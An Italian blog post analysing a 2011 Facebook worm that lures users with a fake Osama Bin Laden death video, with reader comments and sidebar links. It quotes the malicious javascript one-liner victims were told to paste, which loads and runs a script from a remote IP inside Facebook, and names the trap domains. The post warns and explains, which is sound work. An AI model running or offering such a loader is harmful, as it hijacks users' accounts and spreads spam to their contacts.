Osama Bin Laden ora è un virus su Facebook

Da ieri sera la curiosità morbosa e le perplessità diffuse sulla morte di Osama Bin Laden sono diventate un virus, anche se tecnicamente si può definire in molti altri modi, che impazza su Facebook e frega centinaia di migliaia di incauti navigatori.

 

Come funziona? Si riceve sulla bacheca, o via chat o via messaggio privato, la segnalazione da parte di un amico che invita a visitare una pagina Facebook trappola, dove si dovrebbe poter vedere il video segreto della morte del leader di AlQaeda. Il link di solito è accompagnato da un breve messaggio generico come “questo è davvero scioccante..”. Inutile dire che la quasi totalità dei detentori di un profilo non esita un solo secondo e clicca compulsivamente sul link, per atterrare su una pagina pubblica dove si aspetta di trovare il famigerato video: la pagina trappola, per l’appunto.

 

Fin qui tutto bene? Non proprio. Già la semplice pressione del link conduce attraverso una serie interminabile di redirect dietro le quinte, ovvero di rimbalzi tra server e pagine diverse, che ogni volta caricano contenuti e script potenzialmente malevoli nel computer dello sprovveduto curiosone (curiosity killed the cat, ah…se ogni tanto ce lo ricordassimo!). Ecco una stampata ottenuta con uno sniffer http (cliccare sull’immagine per una vederne una versione più nitida).

 

 

 Come si può vedere dalla lista dello scambio http, vengono caricati contenuti remoti non appartenenti al dominio di Facebook. Per esempio la maschera finale presente sulla pagina pubblica di destinazione è residente su http://www.brievela.info/0sama/, e non è escluso che durante questi rimbalzi possano salire a bordo script malevoli. Per esempio, questo che fa di preciso: http://cdn.tynt.com/tc.js (appositamente non cliccabile)? Andrebbe deoffuscato. Solo alla fine di un lungo ping-pong si atterra finalmente sulla pagina pubblica cosiddetta trappola, che ha l’unico scopo di diffondere la procedura a tutta la lista dei propri amici Facebook. La pagina non mostra infatti alcun video, nè una tradizionale bacheca con messaggi, ma un modulo con una serie di istruzioni (quello caricato da www.brievela.info/Osama), criptiche per i più, che una volta eseguite passo passo – si assicura – permetteranno di vedere il video tanto agognato.

 

Aiutami a continuare a fare informazione libera

 

 

L’aspetto della pagina trappola di per se stesso dovrebbe bastare a dissuadere anche gli individui meno sospettosi per natura (ignari che il solo fatto di esservi approdati abbia comportato una navigazione intermedia così tempestosa e foriera di un destino poco fortunato). Invece no: il fascino dell’hacker fai-da-te, destato dall’emozione di immettere codici informatici di cui non si capisce assolutamente nulla, è una tentazione troppo forte. Così l’incauto internauta esegue le istruzioni, ed è lì che i fantasiosi progettisti del software malevolo possono cantare vittoria, perché inizia finalmente la fase finale, quella della riproduzione sessuale del virus sociale.

E’ difficile spiegare a chi non è del mestiere cosa fanno quelle righe di codice che, con un po’ di leggerezza, si eseguono spontaneamente, rapiti dai fumi dell’ossessione morbosa, ma proverò a farlo con parole semplici, perché il meccanismo sia chiaro a chi informatico non è – e del resto, se lo fosse, non ci sarebbe cascato.

Il programma con il quale navigate in internet, detto browser (per esempio Internet Explorer, Firefox, Chrome, Opera, Safari e via dicendo sono tutti browser, cioè “navigatori”), è capace non solo di leggere il contenuto informativo di una pagina, ovvero il layout e il testo, ma anche di eseguire istruzioni scritte in linguaggi di programmazione alquanto limitati ma sufficienti a fare la maggior parte delle cose necessarie per la navigazione online. Questi linguaggi sono i cosiddetti “linguaggi di scripting“, e il codice che eseguono si chiama “script“. Uno dei linguaggi di scripting più usati si chiama “javascript“. Se digitate javascript:alert(‘Bravo: hai vinto un premio!’); nella barra dove inserite gli indirizzi internet, in molti casi potrete rendervi conto da soli di quello che accade.

Cosa vi viene chiesto di inserire nella barra degli indirizzi? Questo:

javascript: (a=(b=document).createElement(‘script’)).src = ‘//109.230.246.175/strummer.php?’ + Math.random(),b.body.appendChild(a);void(0)

Il codice crea banalmente un nuovo script, carica il contenuto (le effettive linee di codice, cioè il programma da eseguire) da un server remoto (//109.230.246.175/strummer.php), si assicura che il browser lo ricarichi ogni volta che si tenta di eseguire nuovamente l’operazione, aggiungendo un codice matematico casuale in coda alla richiesta ( Math.random() genera numeri casuali tra 0 e 1), sostanzialmente al fine di ingannare il meccanismo di caching del browser fingendo che l’indirizzo sia ogni volta diverso, mentre a cambiare è solo un singolo parametro inutilizzato, e infine aggiunge dinamicamente, al volo, lo script così caricato al corpo del documento della pagina internet sulla quale vi trovate. In buona sostanza, è come se lo script facesse parte effettivamente di quelli che, nel caso di specie, la pagina originaria di Facebook mette a disposizione.

A quel punto il codice (lo script) caricato da remoto viene eseguito automaticamente. Per chi ci volesse guardare dentro, lo allego in un file di testo con estensione txt (e quindi innocuo, non eseguibile) e scaricabile da qui.

Cosa fa di preciso? Difficile dirlo con esattezza senza rompersi il capo riga per riga, cercando di riportare ordine nella formattazione caotica dello script, e io non ne ho voglia. Ma ad uno sguardo generico mi pare si possa affermare che non faccia nulla di grave (dove per grave intendo trafficare tra i vostri dati sul computer e trasferire codici di carte di credito, password bancarie, installare malware etc, e del resto per quello il rischio maggiore, se c’è stato, l’abbiamo corso cliccando inizialmente sul primo link), se non iniziare ad interagire con il motore di scripting di Facebook, ovvero quella libreria inclusa nelle pagine del social network proprio al fine di permettere un’interazione programmabile con tutte le complesse funzionalità del sito, e dare inizio ad un trasferimento di massa verso tutti i vostri contatti. Non prima di avere però effettuato una chiamata a una misteriosa pagina, ottenuta attraverso l’uso programmatico dei servizi di “url shortening” (i siti che abbreviano gli indirizzi lunghi e li fanno piccini piccini): http://www.mytimecount.info/red.php, che al momento in cui scrivo risulta indisponibile ma che proprio grazie al meccanismo del redirect offerto dall’url shortener avrà già cambiato dinamicamente il suo indirizzo e si sarà trasferita agilmente altrove. Tale pagina dovrebbe essere sostanzialmente, seppure migrata rispetto alla volta precedente, la prima visitata dal vostro amico del cuore che state per fregare, quella che dopo avere iniettato il browser di codici affatto benevoli redirezionerà l’utente verso l’indirizzo di una pagina trappola nuova, creata ad hoc a mano a mano che quelle vecchie vengono di volta in volta disattivate dal sistema di protezione di Facebook.

Inizialmente, in maniera abbastanza furba, lo script vi invita ad attendere, mostrando il seguente messaggio a schermo: “Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!“. Lo scopo è quello ovvio di permettere allo script di completare i suoi traffici, che in dipendenza dal numero di amici che avete possono richiedere anche diversi minuti, scongiurando il rischio che vi stufiate e abbandoniate la pagina, interrompendo implicitamente ogni attività. Nel frattempo inizia a diffondersi a tutti i vostri contatti sulla chat, con il seguente testo: “Guarda il video dell’esecuzione di osama bin laden :“, seguito da un indirizzo sempre diverso in maniera da inficiare il meccanismo di segnalazione di Facebook. La seconda mossa è quella di postare il link alle pagine facebook trappola sulle bacheche di tutti i vostri amici, attirandoli sostanzialmente con un paio di messaggi di testo: “questo è davvero scioccante..” e “guarda cosa fanno questi soldati ad Osama! ” e con un’immagine di Osama Bin Laden che viene recuperata da qui: http:// i54.tinypic.com / k0r1xh.jpg. Poi, e questo spiega l’alto numero di fan di queste pagine pubbliche, attiva l’evento “MI PIACE” della pagina al posto vostro, iscrivendovi di fatto tra i fan della pagina a vostra insaputa. In questo modo riesce a fare in poche ore decine di migliaia di fan su una singola pagina trappola. Le pagine trappole sembrano essere molte, e probabilmente vengono create di continuo programmaticamente mentre le vecchie vengono disattivate, ma funzionano tutte in modo sostanzialmente simile.

Un giochetto molto pericoloso insomma, la cui parte minacciosa non consiste in quella terminale, come si potrebbe pensare, che serve solo a replicare il modello, ma si compie con il primo click. Oltre a destare seria preoccupazione per il futuro della propria sicurezza digitale, la diffusione del virus sociale costa moltissimo in termini di tempo perso dalla comunità a cancellare dalle bacheche i link che compaiono come i funghi, costa ancor di più in termini di spreco di risorse hardware e software dei server di Facebook, impegnati a soddisfare richieste illegittime che si susseguono a centinaia di migliaia, il che si traduce in probabili rallentamenti del sistema, costa altresì in termini di risorse umane – il personale di Facebook plausibilmente impiegato per arginare il fenomeno – e ovviamente costa all’incauto utente una bella caduta di stile per essersi fatto cogliere in fallo, vittima di una trappola che lo qualifica come un’internauta sprovveduto di fronte a tutti i suoi amici che ricevono i suoi inoltri automatici. Semprechè i suoi amici non siano ancora più ingenui di lui.

Se siete tra coloro che si sono fatti cogliere impreparati, magari perché sovrappensiero, e hanno anche semplicemente cliccato sul primo collegamento che invitava a vedere il video dell’uccisione di Osama, evitate qualsiasi tipo di navigazione che comporti l’invio di dati sensibili e lanciate immediatamente una scansione globale con il vostro antivirus / antimalware / antirootkit e antisfiga di fiducia. Non farlo potrebbe avere effetti imprevisti e possibilmente spiacevoli.

Diffidare, gente, diffidare degli inviti troppo sberluccicanti per essere realistici, e soprattutto dei giochetti inusuali, che dopo un meccanismo di certosino taglia e incolla vi promettono l’accesso a documenti super-segreti. Si tratta sempre al 100% di bufale. E possono costare care.

 

  • Facebook
  • Twitter
  • Digg
  • Delicious
  • Segnalo
  • Diggita
  • Reddit
  • StumbleUpon
  • LinkedIn
  • Upnews
  • FriendFeed
  • Google
  • Tumblr
  • Email
  • OkNotizie
donate

12 risposte a Osama Bin Laden ora è un virus su Facebook

  • 5
    METAL4EVER

    io ho cliccato sul link,ma mi ha reindirizzato alla home di facebook,premetto che stavo con ubuntu.Mi dovrei preoccupare??

    • 5.1

      reindirizza su facebook solo al termine di una serie di invisibili ping pong, come puoi vedere dall’imagine. con Ubuntu stai molto più sicuro.

  • 4
    MaleBolge
  • 3
    kiara

    io sono una delle boccalone che ha a perto il link..mi era parso strano, ma tant’è..cmq cosa devo fare? cosa devo aspettarmi? posso usare il mio pc con tranquillità anche per fare acquisti o controllare conti correnti oppure no? fatemi sapere, in materia sono completamente ignorante!!!

    • 3.1

      Una volta che hai chiuso la pagina trappola di facebook, il codice cessa di esistere, almeno per la lettura che ne ho dato abbastanza sommariamente, ma a naso mi pare abbastanza improbabile che possa fare altro, a meno che quella pagina red,php,chiamata inizialmente, non fosse un veicolo di trojan.

      Una buona scansione con un buon antivirus/antimalware e passa la paura.

  • 2
    iry0013

    Anche io ci sono cascata!!! C’ho cliccatosopra e ho eseguito tutte le istruzioni D:

    E adesso non riesco più a condividere i link su Facebook D:

     

  • 1
    brudicchio

    Io sono stato spinto dalla tentazione a cliccare sul 1° link ora che ho letto questo testo di Byoblu…. comunque ho come antivirus GData IS 2011 in massima protezione su Win7 64bit… non mi ha notificato niente…. anche se dovrei vedere qualche comportamento strano rimetto la copia di sicurezza immagine con Acronis True Image…. GData lo danno per il migliore perchè è l’unico ad avere doppio motore di scansione… ecco la fonte: http://www.av-comparatives.org/images/stories/test/ondret/avc_od_feb2011.pdf

  • 0
    Lagna

    Con Osama non ci sarei cascato…

    Ma quando ho letto “Jessica Alba S€xtape” non ci ho più visto… 

  • -1
    afrodite

    anche io ci sono cascata, ho come antivirus AVG la versione free, pensi che vada bene???? Grazie di tutto ;-)

  • -2
    mattia

    Gentile Byoblu,

    io ci sono finito sulla pagina da un articolo – non ci crederai – su corriere.it, che contiene il link. Poi ho chiuso tutto, mi sono disconnesso e ho fatto una scansione completa e profonda con avast. Non è stato trovato nulla… devo stare tranquillo o sono ancora in pericolo?

    Grazie mille

  • -3
    _Luca_

    Grazie Claudio, per la segnalazione e per la spiegazione a chi se ne intende meno di te…

    Ti vorrei fare una domanda: questo passaggio

    QUOTE

    Inizialmente, in maniera abbastanza furba, lo script vi invita ad attendere, mostrando il seguente messaggio a schermo: “Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!“. Lo scopo è quello ovvio di permettere allo script di completare i suoi traffici…

    UNQUOTE

    si verifica anche sui siti di hosting (tipo Megaupload) fanno aspettare TOT secondi prima di iniziare il download?

     

    Ciao e buona guarigione…

     

    Luca

Avvertenze da leggere prima di intervenire sul blog di ByoBlu.


Non sono consentiti:
* messaggi non inerenti al post
* messaggi privi di indirizzo email
* messaggi anonimi (cioè senza nome e cognome)
* messaggi pubblicitari
* messaggi con linguaggio offensivo
* messaggi che contengono turpiloquio
* messaggi con contenuto razzista o sessista
* messaggi il cui contenuto costituisce una violazione delle leggi italiane
  (istigazione a delinquere o alla violenza, diffamazione, ecc.)
* messaggi il cui contenuto rappresenta un'aggressione alla persona e non alle sue idee
* messaggi eccessivamente lunghi
* messaggi formattati in modo da diminuire la fruibilità delle discussioni

Non è possibile copiare e incollare commenti di altri nel proprio. Comunque il proprietario del blog potrà in qualsiasi momento, a suo insindacabile giudizio, cancellare i messaggi. In ogni caso il proprietario del blog non potrà essere ritenuto responsabile per eventuali messaggi lesivi di diritti di terzi.

I Mini Blu

Gianluigi Paragone si toglie qualche sassolino dopo la chiusura de La Gabbia

Gianluigi Paragone Andrea Salerno Intendiamoci: La Gabbia era pur sempre una trasmissione televisiva. E come tutte le trasmissioni televisive, ne rispettava il linguaggio, i tempi, le liturgie e i limiti. Quelli che internet era nata per travalicare. Tuttavia, tra tutte le trasmissioni televisive era certamente la più libera. E Paragone,...--> LEGGI TUTTO

Giulietto Chiesa: siamo stati formattati

Giulietto Chiesa - Siamo Stati Formattati - Play Intervento di Giulietto Chiesa al primo congresso fondativo di "Attuare la Costituzione", tenutosi a Napoli. Giulietto parla di come l'informazione sia la prima battaglia da combattere per rientrare in una democrazia compiuta.  (altro…)...--> LEGGI TUTTO

La Glaxo nel 2015 ha dato 11 milioni di euro a medici e ricercatori italiani

Glaxxo La EFPIA (European Federation of Pharmaceutical Industries and Associations) è una associazione delle industrie farmaceutiche che incoraggia i propri affiliati alla trasparenza. Per ottemperare alle sue richieste, la Glaxo-Smith-Kline ha reso pubblici, fra le altre cose, anche gli elenchi dei medici italiani che nel 2015 hanno ricevuto finanziamenti...--> LEGGI TUTTO

Cedere sovranità è reato! A dirlo finalmente è un tribunale.

Marco Mori - Cedere sovranità è reato - Play Marco Mori, avvocato di Genova, spiega un decreto del Tribunale di Cassino che afferma finalmente a chiare lettere che cedere sovranità è reato! Sulla base di questo decreto si aprono praterie giuridiche, e soprattutto si potranno chiamare criminali coloro che, a qualunque titolo, hanno invocato, invocano o...--> LEGGI TUTTO

La crisi della sinistra, spiegata dal grande vecchio socialdemocratico, Klaus von Dohnanyi.

La crisi della sinistra europea klaus Von Dohnanyi è un giurista nonché uno storico membro dell'SPD. Dal 1971 al 1974 è stato ministro della cultura, nonché parlamentare tra il 1969 e il 1981, poi sindaco di Amburgo dal 1981 al 1988. È stato uno dei protagonisti della vita politica tedesca nel periodo...--> LEGGI TUTTO

Notizie dal web

Gli esperti di diritto sulla Catalogna? Sono dei pirla.

Catalogna Governo centrale di Paolo Becchi Eccoli alla carica sui giornaloni gli esperti del diritto, e più sono esperti e più sono dei pirla. Fantozzi docet. Il referendum per l’indipendenza della Catalogna è «illegale». Sì, lo è: è contro la Costituzione spagnola, contro l’«unità indissolubile» dello...--> LEGGI TUTTO

Due piantine di Cannabis per lenire dolori atroci: in prigione a 63 anni!

prigione malato cannabisTRENTO. Il ricorso in Cassazione è stato rigettato. L'uomo di 63 anni che a Trento era stato trovato in possesso di due piante di marijuana che coltivava per uso personale, per lenire i dolori atroci della sua malattia, è stato giudicato colpevole in via definitiva. Andrà in prigione. ...--> LEGGI TUTTO

L’ideologo di Putin: in Europa sarà presto caos, guerra civile, distruzione.

Dugin ideologo Putindi Giulio Meotti Roma. Europa e Stati Uniti hanno spesso ricambiato il favore ad Aleksandr Dugin. Un anno fa, il famoso politologo russo è stato messo alla porta in Grecia. Accompagnato dal patriarca di Mosca Kirill per una conferenza sul Monte Athos, Dugin...--> LEGGI TUTTO

CURIOSITA’

A Capodanno aggiungete un secondo extra al vostro orologio: la Terra rallenta!

A capodanno aggiungete un secondo extra al vostro orologio - la Terra rallentaUn "salto" di un secondo verrà aggiunto al conto alla rovescia di questo Capodanno per compensare il rallentamento nella velocità di rotazione della Terra.  Il secondo "extra" accadrà non appena l'orologio toccherà la mezzanotte e verranno "create" le ore 23:59:60, posticipando momentaneamente l'arrivo del Capodanno. Il secondo...--> LEGGI TUTTO

BIOMETRIA, IL FUTURO DELLA SICUREZZA

biometriaRiconoscimento dell'iride, facciale e del movimento della mano durante la firma: le nuove strategie per prevenire i furti e le loro possibili applicazioni Un uomo si avvicina a una stanza blindata. Per entrare niente password o codici di sicurezza, ma l'accostamento degli occhi a un...--> LEGGI TUTTO

Dai siti web agli oggetti web: la rete delle idee che sta per arrivare.

Libro digitale su una panchina internet delle cose Che lo crediate o no, c'è stato un tempo in cui per costruire un sito web di successo bastava conoscere un po' di html. Era la fine degli anni '90 ed è stato così anche per una buona parte degli anni 2000. Affittavi un po' di spazio...--> LEGGI TUTTO

Categorie
Guest post

Realizzata la prima video chiamata quantistica intercontinentale al mondo

Chiamata quantisticaIl satellite cinese Micius torna a far parlare di sé e stabilisce un nuovo record, quello della prima videochiamata quantistica della storia tra Vienna e Pechino. Circa tre settimane è avvenuto un evento eccezionale che modificherà totalmente il sistema di comunicazioni come lo...--> LEGGI TUTTO

Il Messico a meno di 40 euro al giorno!

Messico Amo il Messico. E' pieno di vibrazioni, è un paese meraviglioso, pieno di gente amichevole, con una energia speciale che vi fa riscoprire l'amore per la vita, con un'architettura spettacolare, con una storia che affonda le radici nelle profondità dei millenni e... con un cibo davvero...--> LEGGI TUTTO

Negli Uffizi dei Medici: itinerario mediceo all’interno della Galleria più famosa di Firenze.

Scoprire Firenze La Galleria degli Uffizi è il sito museale più famoso di Firenze, nonché uno dei più frequentati d’Italia: quelli che riescono a superarlo per visitatori, infatti, si contano sulle dita di una mano. Gran parte dei turisti scelgono un hotel su portali come expedia proprio per...--> LEGGI TUTTO

tasto_newsletter
Video dal web

Rimozione forzata. La libera rete chiude!

Rimozione forzata - la libera rete chiude - Play ORE 19. Live su Salvo 5.0, con Claudio Messora, Antonio Rinaldi, Tommaso Minniti e Salvo Mandarà....GUARDA

Becchi: è l’era delle piccole patrie. Me ne batto il ca@@o di quanti hanno votato al referendum catalano.

Becchi Referendum Catalogna Matrix Becchi a Matrix perde le staffe sul referendum in Catalogna. "Al di sopra di ogni Costituzione ci sono due diritti fondamentali. Il diritto di resistenza e il diritto di secedere. Non sappiamo come andrà a finire, ma la responsabilità di una guerra civile...GUARDA

Il giorno in cui la democrazia in UE gettò la maschera

Il vero volto della democrazia nell'Unione Europea Il giorno in cui la democrazia in UE gettò la maschera, e apparve finalmente a tutti, solare, radioso, il suo vero volto....GUARDA

E dopo le “primarie” M5S, il PD torna in testa: 1,2 punti in meno.

Sondaggio M5S 25 settembre - play Sorpresa: dopo le "primarie" del Movimento 5 Stelle, Di Maio perde subito 1,2 punti percentuali e torna in testa il PD. A darne notizia, Mentana al TG7. Il calo, e il sorpasso del Partito Democratico, vengono attribuiti al modo in cui le cosiddette primarie sono state...GUARDA

Becchi: e adesso in Parlamento arriva CasaPound

Becchi - Movimento 5 Stelle - CasaPound A Omnibus (LA7) questa mattina, Di Pietro spiega che, secondo lui, il Movimento 5 Stelle in realtà non vuole affatto governare, perché non gli conviene, e Becchi prevede che, grazie all'abbandono della critica forte su Euro, Europa e finanza, e al rigetto dell'etichetta di "populismo", avremo...GUARDA

Pigi Battista a Paragone: i bambini non sono proprietà dei genitori.

Paragone Pigi Battista Nell'annoso dibattito sui vaccini, ci sono i Free Vax, i No Vax, e poi i Pigi Battista. Quelli che "i bambini non sono di proprietà dei genitori". Certamente non sono una proprietà, così come si intende un oggetto acquistato e privo di diritti. Ma il sottinteso...GUARDA

Rula Jebreal a Porro: tu, uomo bianco sessista!

PORRO VS RULA Scontro tra Rula Jebreal e Nicola Porro: "tu uomo bianco sessista che punti il dito contro una come me"....GUARDA

Barbara Lezzi maltratta Luigi Marattin a Omnibus

Barbara Lezzi Luigi Marattin Barbara Lezzi (M5S) si confronta duramente con Luigi Marattin, consigliere economico della Presidenza del Consiglio, sui dati della disoccupazione che vede l'Italia, nonostante la "cura Renzi", aumentare il distacco rispetto alla media europea. Ricordati di VOTARE Byoblu ai Macchianera Internet Awards...GUARDA

Film, libri e Dvd

Il ritorno alla bellezza passa anche dall’acquisto di un oggetto di design

Design e bellezza Ci sono oggetti che devono semplicemente funzionare, non importa quanto siano brutti. E, soprattutto, devono rompersi in fretta, in maniera da poter essere acquistati nuovamente, e poi ancora, e ancora, infinite volte. Tante quante bastano a soddisfare le esigenze del sistema produttivo. Altri devono semplicemente essere...==> GUARDA TUTTO ==>

Le cuffie migliori per la musica

Cuffie Pryma C'era un tempo in cui il mangiadischi la faceva da padrone. La cosiddetta alta fedeltà era un lusso per pochi, spesso riservata agli studi di registrazione dove le celebrità registravano le loro nuove hits. Poi vennero gli Hi-Fi, prodotti consumer ma con la capacità di riprodurre un'ampia...==> GUARDA TUTTO ==>

Lights Out: Terrore nel Buio – Trailer Hd ITA ufficiale #NonSpegnereLaLuce – film horror

LIGHTS OUT TERRORE NEL BUIO TRAILER ITA HD UFFICIALEIl trailer HD ITA (in italiano) di Lights Out: terrore nel buio. #NonSpegnereLaLuce I migliori film horror a casa tua: Film Horror al Cinema. Dal produttore James Wan (“L’evocazione-The Conjuring”), è in arrivo il racconto di un terrore sconosciuto in...==> GUARDA TUTTO ==>